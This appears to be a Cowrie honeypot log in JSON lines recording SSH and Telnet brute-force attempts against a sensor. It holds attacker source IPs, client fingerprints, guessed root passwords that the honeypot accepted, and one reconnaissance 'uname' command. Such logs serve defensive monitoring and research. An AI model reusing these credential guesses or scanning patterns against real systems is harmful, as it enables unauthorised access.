{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.101714Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.102342Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.119522Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"fc:fe:0e:a0:8f:95:2d:75:6c:b3:04:67:e3:1e:da:1c","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc3BlbiQaznPT8TScrs9YIzmrpI9Lpa4LtCjB5z0LuQ4o6XwvzomxAixn2F1jaUl175Cxcg3PmUsPOLE+WeWicKqL2YZ46SotjZgnS6JjXpuZVi7V0DSiXu0itlwWDC9m8huBvUBSIsDCsgb9OeG6rlrCyZgTW+qZciK+KZ8rwlFp3CFyxoF2122ueOnl5pAUCy1iHqGun03dMdUxA1d3KnxSZ3NQrYiH69dc8/YhV4SriOW9psc0pv9KeBLF0OXHtEAdbnSlwfk2uTjjBMK0nDidl7wS52Ygi/H4+P+4EXkSzf4Jj4/L6P3c5rLC3/l3RFdo1T7EQ8fH6NsTYJNZ7","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T16:12:20.120914Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:12:30.050108Z","src_ip":"139.19.117.131","session":"51c0488066d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46715,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ecf656174a3","protocol":"telnet","message":"New connection: 212.227.125.160:46715 (1.2.3.4:23) [session: 5ecf656174a3]","sensor":"my-vps","timestamp":"2025-08-26T16:13:03.908885Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46652,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa10a1c0ecbd","protocol":"ssh","message":"New connection: 212.227.235.229:46652 (1.2.3.4:22) [session: fa10a1c0ecbd]","sensor":"my-vps","timestamp":"2025-08-26T16:13:31.371494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:13:32.130162Z","src_ip":"212.227.235.229","session":"fa10a1c0ecbd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:13:32.130929Z","src_ip":"212.227.235.229","session":"fa10a1c0ecbd"}
{"eventid":"cowrie.login.success","username":"root","password":"Naresh@123","message":"login attempt [root/Naresh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:13:34.798392Z","src_ip":"212.227.235.229","session":"fa10a1c0ecbd"}
{"eventid":"cowrie.session.closed","duration":31.271545886993408,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:13:35.180359Z","src_ip":"212.227.125.160","session":"5ecf656174a3"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:13:35.285290Z","src_ip":"212.227.235.229","session":"fa10a1c0ecbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46730,"dst_ip":"1.2.3.4","dst_port":23,"session":"93d57313199b","protocol":"telnet","message":"New connection: 212.227.125.160:46730 (1.2.3.4:23) [session: 93d57313199b]","sensor":"my-vps","timestamp":"2025-08-26T16:13:50.007371Z"}
{"eventid":"cowrie.session.closed","duration":120.01579070091248,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:15:50.023080Z","src_ip":"212.227.125.160","session":"93d57313199b"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":36445,"dst_ip":"1.2.3.4","dst_port":23,"session":"93f838ee7613","protocol":"telnet","message":"New connection: 222.137.42.217:36445 (1.2.3.4:23) [session: 93f838ee7613]","sensor":"my-vps","timestamp":"2025-08-26T16:16:22.357763Z"}
{"eventid":"cowrie.session.closed","duration":12.686545848846436,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:16:35.044209Z","src_ip":"222.137.42.217","session":"93f838ee7613"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":36743,"dst_ip":"1.2.3.4","dst_port":23,"session":"8edd9de7b1d7","protocol":"telnet","message":"New connection: 222.137.42.217:36743 (1.2.3.4:23) [session: 8edd9de7b1d7]","sensor":"my-vps","timestamp":"2025-08-26T16:16:35.273001Z"}
{"eventid":"cowrie.session.closed","duration":12.776238203048706,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:16:48.048362Z","src_ip":"222.137.42.217","session":"8edd9de7b1d7"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":37056,"dst_ip":"1.2.3.4","dst_port":23,"session":"22f97c95883f","protocol":"telnet","message":"New connection: 222.137.42.217:37056 (1.2.3.4:23) [session: 22f97c95883f]","sensor":"my-vps","timestamp":"2025-08-26T16:16:48.195310Z"}
{"eventid":"cowrie.session.closed","duration":12.818895101547241,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:01.014121Z","src_ip":"222.137.42.217","session":"22f97c95883f"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":37371,"dst_ip":"1.2.3.4","dst_port":23,"session":"a05f44133a4a","protocol":"telnet","message":"New connection: 222.137.42.217:37371 (1.2.3.4:23) [session: a05f44133a4a]","sensor":"my-vps","timestamp":"2025-08-26T16:17:01.191137Z"}
{"eventid":"cowrie.session.closed","duration":12.836307287216187,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:14.027338Z","src_ip":"222.137.42.217","session":"a05f44133a4a"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":37682,"dst_ip":"1.2.3.4","dst_port":23,"session":"849c817e7d10","protocol":"telnet","message":"New connection: 222.137.42.217:37682 (1.2.3.4:23) [session: 849c817e7d10]","sensor":"my-vps","timestamp":"2025-08-26T16:17:14.298769Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50408,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5444794a484","protocol":"ssh","message":"New connection: 217.72.205.35:50408 (1.2.3.4:22) [session: f5444794a484]","sensor":"my-vps","timestamp":"2025-08-26T16:17:26.043425Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:26.044574Z","src_ip":"217.72.205.35","session":"f5444794a484"}
{"eventid":"cowrie.session.closed","duration":12.776588916778564,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:27.075245Z","src_ip":"222.137.42.217","session":"849c817e7d10"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":37993,"dst_ip":"1.2.3.4","dst_port":23,"session":"13a579c90533","protocol":"telnet","message":"New connection: 222.137.42.217:37993 (1.2.3.4:23) [session: 13a579c90533]","sensor":"my-vps","timestamp":"2025-08-26T16:17:27.225622Z"}
{"eventid":"cowrie.session.closed","duration":12.808167934417725,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:40.033719Z","src_ip":"222.137.42.217","session":"13a579c90533"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":38302,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b809db16ae8","protocol":"telnet","message":"New connection: 222.137.42.217:38302 (1.2.3.4:23) [session: 0b809db16ae8]","sensor":"my-vps","timestamp":"2025-08-26T16:17:40.222744Z"}
{"eventid":"cowrie.session.closed","duration":12.838620662689209,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:17:53.061242Z","src_ip":"222.137.42.217","session":"0b809db16ae8"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":38619,"dst_ip":"1.2.3.4","dst_port":23,"session":"680ac4229698","protocol":"telnet","message":"New connection: 222.137.42.217:38619 (1.2.3.4:23) [session: 680ac4229698]","sensor":"my-vps","timestamp":"2025-08-26T16:17:53.249391Z"}
{"eventid":"cowrie.session.closed","duration":12.796776294708252,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:18:06.046079Z","src_ip":"222.137.42.217","session":"680ac4229698"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":38938,"dst_ip":"1.2.3.4","dst_port":23,"session":"f938496728ea","protocol":"telnet","message":"New connection: 222.137.42.217:38938 (1.2.3.4:23) [session: f938496728ea]","sensor":"my-vps","timestamp":"2025-08-26T16:18:06.208475Z"}
{"eventid":"cowrie.session.closed","duration":12.8435697555542,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:18:19.051950Z","src_ip":"222.137.42.217","session":"f938496728ea"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":39261,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1aeeec20fa8","protocol":"telnet","message":"New connection: 222.137.42.217:39261 (1.2.3.4:23) [session: d1aeeec20fa8]","sensor":"my-vps","timestamp":"2025-08-26T16:18:19.228198Z"}
{"eventid":"cowrie.session.closed","duration":12.810267210006714,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:18:32.038342Z","src_ip":"222.137.42.217","session":"d1aeeec20fa8"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":39578,"dst_ip":"1.2.3.4","dst_port":23,"session":"1dd5004c0f43","protocol":"telnet","message":"New connection: 222.137.42.217:39578 (1.2.3.4:23) [session: 1dd5004c0f43]","sensor":"my-vps","timestamp":"2025-08-26T16:18:32.225756Z"}
{"eventid":"cowrie.session.closed","duration":12.858824491500854,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:18:45.084515Z","src_ip":"222.137.42.217","session":"1dd5004c0f43"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":39903,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ff7ef7f1e65","protocol":"telnet","message":"New connection: 222.137.42.217:39903 (1.2.3.4:23) [session: 7ff7ef7f1e65]","sensor":"my-vps","timestamp":"2025-08-26T16:18:45.226460Z"}
{"eventid":"cowrie.session.closed","duration":12.815524578094482,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:18:58.041794Z","src_ip":"222.137.42.217","session":"7ff7ef7f1e65"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":40217,"dst_ip":"1.2.3.4","dst_port":23,"session":"db3514bfda0f","protocol":"telnet","message":"New connection: 222.137.42.217:40217 (1.2.3.4:23) [session: db3514bfda0f]","sensor":"my-vps","timestamp":"2025-08-26T16:18:58.214929Z"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":44450,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4adc76642ed","protocol":"ssh","message":"New connection: 193.32.162.145:44450 (1.2.3.4:22) [session: c4adc76642ed]","sensor":"my-vps","timestamp":"2025-08-26T16:19:02.780502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:19:02.782128Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T16:19:02.812195Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.login.success","username":"root","password":"iproyal","message":"login attempt [root/iproyal] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:19:02.903851Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:19:03.028935Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T16:19:03.029896Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:03.061695Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:03.062844Z","src_ip":"193.32.162.145","session":"c4adc76642ed"}
{"eventid":"cowrie.session.closed","duration":12.84165906906128,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:11.056515Z","src_ip":"222.137.42.217","session":"db3514bfda0f"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":40536,"dst_ip":"1.2.3.4","dst_port":23,"session":"c55075a2f772","protocol":"telnet","message":"New connection: 222.137.42.217:40536 (1.2.3.4:23) [session: c55075a2f772]","sensor":"my-vps","timestamp":"2025-08-26T16:19:11.225965Z"}
{"eventid":"cowrie.session.closed","duration":12.819401502609253,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:24.045302Z","src_ip":"222.137.42.217","session":"c55075a2f772"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":40850,"dst_ip":"1.2.3.4","dst_port":23,"session":"84063ad978c5","protocol":"telnet","message":"New connection: 222.137.42.217:40850 (1.2.3.4:23) [session: 84063ad978c5]","sensor":"my-vps","timestamp":"2025-08-26T16:19:24.215976Z"}
{"eventid":"cowrie.session.closed","duration":12.867032527923584,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:37.082908Z","src_ip":"222.137.42.217","session":"84063ad978c5"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":41165,"dst_ip":"1.2.3.4","dst_port":23,"session":"501f5855a78d","protocol":"telnet","message":"New connection: 222.137.42.217:41165 (1.2.3.4:23) [session: 501f5855a78d]","sensor":"my-vps","timestamp":"2025-08-26T16:19:37.235497Z"}
{"eventid":"cowrie.session.closed","duration":12.83081841468811,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:19:50.066246Z","src_ip":"222.137.42.217","session":"501f5855a78d"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":41487,"dst_ip":"1.2.3.4","dst_port":23,"session":"cb090019809a","protocol":"telnet","message":"New connection: 222.137.42.217:41487 (1.2.3.4:23) [session: cb090019809a]","sensor":"my-vps","timestamp":"2025-08-26T16:19:50.247715Z"}
{"eventid":"cowrie.session.closed","duration":12.845181703567505,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:03.092823Z","src_ip":"222.137.42.217","session":"cb090019809a"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":41811,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d0f840e99e2","protocol":"telnet","message":"New connection: 222.137.42.217:41811 (1.2.3.4:23) [session: 6d0f840e99e2]","sensor":"my-vps","timestamp":"2025-08-26T16:20:03.298041Z"}
{"eventid":"cowrie.session.closed","duration":12.760031938552856,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:16.058004Z","src_ip":"222.137.42.217","session":"6d0f840e99e2"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":42136,"dst_ip":"1.2.3.4","dst_port":23,"session":"9a9fc8bb0f25","protocol":"telnet","message":"New connection: 222.137.42.217:42136 (1.2.3.4:23) [session: 9a9fc8bb0f25]","sensor":"my-vps","timestamp":"2025-08-26T16:20:16.207478Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33540,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d5693d7dff6","protocol":"ssh","message":"New connection: 212.227.235.229:33540 (1.2.3.4:22) [session: 3d5693d7dff6]","sensor":"my-vps","timestamp":"2025-08-26T16:20:22.877745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:20:23.291247Z","src_ip":"212.227.235.229","session":"3d5693d7dff6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:20:23.292837Z","src_ip":"212.227.235.229","session":"3d5693d7dff6"}
{"eventid":"cowrie.login.success","username":"root","password":"ZAQ!2wsx","message":"login attempt [root/ZAQ!2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:20:26.560446Z","src_ip":"212.227.235.229","session":"3d5693d7dff6"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:27.253810Z","src_ip":"212.227.235.229","session":"3d5693d7dff6"}
{"eventid":"cowrie.session.closed","duration":12.871605157852173,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:29.079017Z","src_ip":"222.137.42.217","session":"9a9fc8bb0f25"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":42468,"dst_ip":"1.2.3.4","dst_port":23,"session":"333a534624eb","protocol":"telnet","message":"New connection: 222.137.42.217:42468 (1.2.3.4:23) [session: 333a534624eb]","sensor":"my-vps","timestamp":"2025-08-26T16:20:29.230334Z"}
{"eventid":"cowrie.session.closed","duration":12.839766502380371,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:42.070029Z","src_ip":"222.137.42.217","session":"333a534624eb"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":42791,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b9cb6967bf7","protocol":"telnet","message":"New connection: 222.137.42.217:42791 (1.2.3.4:23) [session: 0b9cb6967bf7]","sensor":"my-vps","timestamp":"2025-08-26T16:20:42.286033Z"}
{"eventid":"cowrie.session.closed","duration":12.74393916130066,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:20:55.029900Z","src_ip":"222.137.42.217","session":"0b9cb6967bf7"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":43119,"dst_ip":"1.2.3.4","dst_port":23,"session":"807139497b7d","protocol":"telnet","message":"New connection: 222.137.42.217:43119 (1.2.3.4:23) [session: 807139497b7d]","sensor":"my-vps","timestamp":"2025-08-26T16:20:55.302640Z"}
{"eventid":"cowrie.session.closed","duration":12.818213939666748,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:21:08.120783Z","src_ip":"222.137.42.217","session":"807139497b7d"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":43443,"dst_ip":"1.2.3.4","dst_port":23,"session":"a94704c9a9c1","protocol":"telnet","message":"New connection: 222.137.42.217:43443 (1.2.3.4:23) [session: a94704c9a9c1]","sensor":"my-vps","timestamp":"2025-08-26T16:21:08.258649Z"}
{"eventid":"cowrie.session.closed","duration":12.811999797821045,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:21:21.070553Z","src_ip":"222.137.42.217","session":"a94704c9a9c1"}
{"eventid":"cowrie.session.connect","src_ip":"222.137.42.217","src_port":43762,"dst_ip":"1.2.3.4","dst_port":23,"session":"38289979c5aa","protocol":"telnet","message":"New connection: 222.137.42.217:43762 (1.2.3.4:23) [session: 38289979c5aa]","sensor":"my-vps","timestamp":"2025-08-26T16:21:21.258976Z"}
{"eventid":"cowrie.session.closed","duration":12.74856185913086,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:21:34.007473Z","src_ip":"222.137.42.217","session":"38289979c5aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60042,"dst_ip":"1.2.3.4","dst_port":22,"session":"5756edd4c16a","protocol":"ssh","message":"New connection: 212.227.235.229:60042 (1.2.3.4:22) [session: 5756edd4c16a]","sensor":"my-vps","timestamp":"2025-08-26T16:22:58.594179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T16:22:59.515155Z","src_ip":"212.227.235.229","session":"5756edd4c16a"}
